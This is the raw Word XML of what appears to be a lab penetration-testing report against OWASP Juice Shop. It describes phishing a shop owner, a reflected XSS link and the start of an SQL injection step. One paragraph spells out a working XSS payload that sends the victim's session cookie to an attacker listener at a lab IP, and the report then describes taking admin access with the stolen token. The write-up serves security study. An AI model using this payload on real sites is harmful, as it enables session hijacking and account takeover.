          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>breaches</w:t>
      </w:r>
      <w:r w:rsidR="00021218" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C08D8B" w14:textId="281F3C0C" w:rsidR="00CA53B0" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CA53B0" w:rsidP="00C05773">
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7DBF4" w14:textId="14E51A1A" w:rsidR="00D26B01" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C05773" w:rsidP="00CA53B0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5359B41" wp14:editId="3A6324B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1196975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>883920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3322608" cy="1577477"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="36050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08860" name="Picture 3605088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81C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>During reconnaissance, the attacker</w:t>
      </w:r>
      <w:r w:rsidR="005C2F1F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EB27BE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>noticed that Mr</w:t>
      </w:r>
      <w:r w:rsidR="000A262A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EB27BE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00E40293" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> might fall for a phishing attack</w:t>
      </w:r>
      <w:r w:rsidR="005B28C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. The hacker then </w:t>
      </w:r>
      <w:r w:rsidR="00B7731C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sent</w:t>
      </w:r>
      <w:r w:rsidR="005B28C9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B7731C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a fake</w:t>
      </w:r>
      <w:r w:rsidR="00EE070F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> professional</w:t>
      </w:r>
      <w:r w:rsidR="00B7731C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r w:rsidR="00100374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B7731C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>asking for co</w:t>
      </w:r>
      <w:r w:rsidR="00D66288" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>operation with Mr. S</w:t>
      </w:r>
      <w:r w:rsidR="00A24793" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’s juice shop.</w:t>
      </w:r>
      <w:r w:rsidR="000D7B89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3D6CE6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If Mr. S f</w:t>
      </w:r>
      <w:r w:rsidR="00353385" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="003D6CE6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ll</w:t>
      </w:r>
      <w:r w:rsidR="00353385" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003D6CE6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the bait, the hacker</w:t>
      </w:r>
      <w:r w:rsidR="00353385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941FCB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is likely to gain temporary access to Mr. S account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21291288" w14:textId="4DF3952F" w:rsidR="00C56DF4" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C56DF4" w:rsidP="00C56DF4">
      <w:pPr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  <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">https://192.168.137.133/#/search?q=&lt;img </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">="x" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>="(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>function(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">) { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>= `http://192.168.137.128:8000/?cookie=${document.cookie}`}())"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537A9814" w14:textId="02E2156A" w:rsidR="00C56DF4" w:rsidRPr="00FA5B3B" w:rsidRDefault="007B765E" w:rsidP="007B765E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14 Phishing Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE965FB" w14:textId="3CECFCBA" w:rsidR="006B1E0C" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C56DF4" w:rsidP="00C05773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  <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FB8A806" wp14:editId="29099524">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>652145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4671465" cy="983065"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="757937426" name="Picture 4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37426" name="Picture 4" descr="A computer screen shot of a compute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773" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001B5CE3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The link </w:t>
      </w:r>
      <w:r w:rsidR="00B27696" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">contains a malicious reflected XSS script that when clicked will send </w:t>
      </w:r>
      <w:r w:rsidR="006F4D3F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the victim</w:t>
      </w:r>
      <w:r w:rsidR="00135140" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and their </w:t>
      </w:r>
      <w:r w:rsidR="006F4D3F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">section cookie to </w:t>
      </w:r>
      <w:r w:rsidR="00BE054C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00135140" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hosted website</w:t>
      </w:r>
      <w:r w:rsidR="00BE054C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00135140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74049E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Since the search bar uses inner HTML for input</w:t>
      </w:r>
      <w:r w:rsidR="00533CBF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, t</w:t>
      </w:r>
      <w:r w:rsidR="005F3987" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">he XSS script uses </w:t>
      </w:r>
      <w:r w:rsidR="00AA6495" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>html tag</w:t>
      </w:r>
      <w:r w:rsidR="00D720E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA6495" w:rsidRPr="00FA5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BDBBE" w14:textId="1A6BB086" w:rsidR="00BE054C" w:rsidRPr="00FA5B3B" w:rsidRDefault="00BE054C" w:rsidP="00BE054C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 xml:space="preserve">Fig.15 </w:t>
      </w:r>
      <w:r w:rsidR="002B2FBA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
      <w:r w:rsidR="00C718CA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>viewpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B964473" w14:textId="695670E9" w:rsidR="00A24793" w:rsidRPr="00FA5B3B" w:rsidRDefault="00B234E2" w:rsidP="00CA53B0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911F20B" wp14:editId="7C400520">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>842645</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>433070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4061460" cy="563880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="135058121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81211" name="Picture 5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39015" r="537" b="32955"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="406146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0EF2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AF3E14" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Copy and paste the token in the application stora</w:t>
      </w:r>
      <w:r w:rsidR="00A60959" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ge then reload the page. At this point, the attacker should have acc</w:t>
      </w:r>
      <w:r w:rsidR="00FC67C1" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>essed as an admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D201F" w14:textId="6631D452" w:rsidR="00FA690B" w:rsidRPr="00FA5B3B" w:rsidRDefault="00B234E2" w:rsidP="00F96D90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 xml:space="preserve">Fig.16 </w:t>
      </w:r>
      <w:r w:rsidR="00FA690B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Paste the section cookie on browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8F8CB" w14:textId="499E3D6F" w:rsidR="009317E8" w:rsidRPr="00FA5B3B" w:rsidRDefault="005738BF" w:rsidP="009317E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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009317E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Web application</w:t>
      </w:r>
      <w:r w:rsidR="00866705" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA10DF6" w14:textId="7DD174A5" w:rsidR="00DE41F8" w:rsidRPr="00FA5B3B" w:rsidRDefault="00DE41F8" w:rsidP="00DE41F8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In case Mr. S doesn’t fall for </w:t>
      </w:r>
      <w:r w:rsidR="002406C2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the bait, the hacker still has other </w:t>
      </w:r>
      <w:r w:rsidR="00547668" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ways to access </w:t>
      </w:r>
      <w:r w:rsidR="009C2484" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>as an</w:t>
      </w:r>
      <w:r w:rsidR="00547668" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r w:rsidR="009C2484" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>istrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212140DF" w14:textId="0DE91268" w:rsidR="00547668" w:rsidRPr="00FA5B3B" w:rsidRDefault="006A4EE7" w:rsidP="009C24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lastRenderedPageBreak/>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F92877A" w14:textId="4173D428" w:rsidR="006D1F04" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C85773" w:rsidP="006D1F04">
      <w:pPr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54B34306" wp14:editId="7F5EABF9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731510" cy="2446655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="884703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0301" name="Picture 8847030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0E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>First the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00856C21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412E70" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>intercepts</w:t>
      </w:r>
      <w:r w:rsidR="00856C21" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the login </w:t>
      </w:r>
      <w:r w:rsidR="005055E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>form post request</w:t>
      </w:r>
      <w:r w:rsidR="00875DFB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="005055E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78428735" w14:textId="241EE586" w:rsidR="00681A4E" w:rsidRPr="00FA5B3B" w:rsidRDefault="00681A4E" w:rsidP="00681A4E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1</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00082F8D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Form interception</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EDDF5" w14:textId="5A526D67" w:rsidR="00610989" w:rsidRPr="00FA5B3B" w:rsidRDefault="00610989" w:rsidP="00610989">
      <w:pPr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E562B7A" wp14:editId="0874166E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048000" cy="175260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="517857628" name="Picture 12" descr="A close-up of a white rectangl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7628" name="Picture 12" descr="A close-up of a white rectangle with green text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3" b="33333"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="304800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55E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, </w:t>
      </w:r>
      <w:r w:rsidR="00412E70" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">then the hacker modifies the payload to perform </w:t>
      </w:r>
      <w:r w:rsidR="0016654F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00AC1EC4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C527F3" w14:textId="6ADB4466" w:rsidR="00681A4E" w:rsidRPr="00FA5B3B" w:rsidRDefault="008A5801" w:rsidP="00681A4E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51E2A257" wp14:editId="5D604EDD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1334135" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="134257458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74588" name="Picture 10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A4E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Fig.1</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00681A4E" w:rsidRPr="00FA5B3B">
        <w:rPr>
